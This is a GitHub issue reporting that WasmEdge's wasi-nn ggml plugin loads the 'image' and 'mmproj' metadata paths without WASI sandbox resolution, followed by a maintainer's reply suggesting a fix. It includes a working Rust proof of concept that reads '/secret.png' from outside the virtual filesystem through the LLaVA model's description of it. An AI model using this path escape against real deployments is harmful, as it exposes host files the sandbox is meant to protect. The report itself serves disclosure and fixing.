bug: the metadata.image and metadata.mmproj passed as json to wasi-nn ggml backend can break through wasi-filesystem

[PeterD1524]

Summary

The metadata.image and metadata.mmproj passed as json to wasi-nn ggml backend can break through wasi-filesystem.

Current State

The wasi-nn ggml backend implementation (plugins/wasi_nn/ggml.cpp) of the function load accepts two graph-builders. One is weight (or maybe preload), and the other is metadata.

The metadata is parsed as json, and its two parameters are image (image path) and mmproj (CLIP model path). They are used for llava model loading images. These path parameters are used directly to load the files.

I think this violates wasi-filesystem. If the image path is controlled by users and it is not sanitized, they can read the image file outside the virtual file system through the LLM response.

Expected State

These path arguments should undergo WASI filesystem path resolution like other filesystem functions.

Reproduction steps

This is an example rust program to somewhat read the contents of an image (/secret.png) outside of the virtual filesystem.

Models:

mys/ggml_llava-v1.5-7b/ggml-model-q4_k.gguf

mys/ggml_llava-v1.5-7b/mmproj-model-f16.gguf

fn main() {
    let graph = wasmedge_wasi_nn::GraphBuilder::new(
        wasmedge_wasi_nn::GraphEncoding::Ggml,
        wasmedge_wasi_nn::ExecutionTarget::AUTO,
    )
    .config(
        serde_json::json!({
            "mmproj": "mmproj-model-f16.gguf",
            "image": "/secret.png",
            "ctx-size": 2048
        })
        .to_string(),
    )
    .build_from_cache("default")
    .unwrap();
    let mut context = graph.init_execution_context().unwrap();
    context
        .set_input(
            0,
            wasmedge_wasi_nn::TensorType::U8,
            &[1],
            concat!(
                "You are a helpful, respectful and honest assistant.\n",
                "USER: what is in this picture?\n",
                "<image>\n",
                "ASSISTANT:"
            )
            .as_bytes(),
        )
        .unwrap();
    context.compute().unwrap();
    let mut out_buffer = vec![0u8; 65536];
    let size = context.get_output(0, &mut out_buffer).unwrap();
    println!("{:?}", String::from_utf8_lossy(&out_buffer[..size]));
}

Run with:

wasmedge --nn-preload default:GGML:AUTO:ggml-model-q4_k.gguf target/wasm32-wasi/release/demo.wasm

Sample output:

" In the image, a young man is wearing a white jacket and appears to be an R&B singer, possibly named Rick Astley. He is standing in front of a brick wall and posing for the camera. The picture is displayed on a digital device screen, possibly a phone or a tablet, which has the album cover of \"Never Gonna Give You Up\" displayed as the background. This suggests that the image might be related to the album or the artist's content.</s>"

A reproduction with docker is at https://github.com/PeterD1524/reproduction/tree/b64e122915a520ef.

Screenshots

No response

Any logs you want to share for showing the specific issue

No response

Components

CLI

WasmEdge Version or Commit you used

0.13.5

Operating system information

Ubuntu 22.04.4 LTS (Jammy Jellyfish)

Hardware Architecture

x86_64

Compiler flags and options

No response

[hydai]

Hi @PeterD1524
Thanks for this issue. We don't currently implement the WASI filesystem proposal. The only thing we have is the fs inside the preview1 spec.

@q82419 To fix this issue, we should populate the VFS into plugins. So, the plugins will have a way to access the sandboxed fs. WDYT?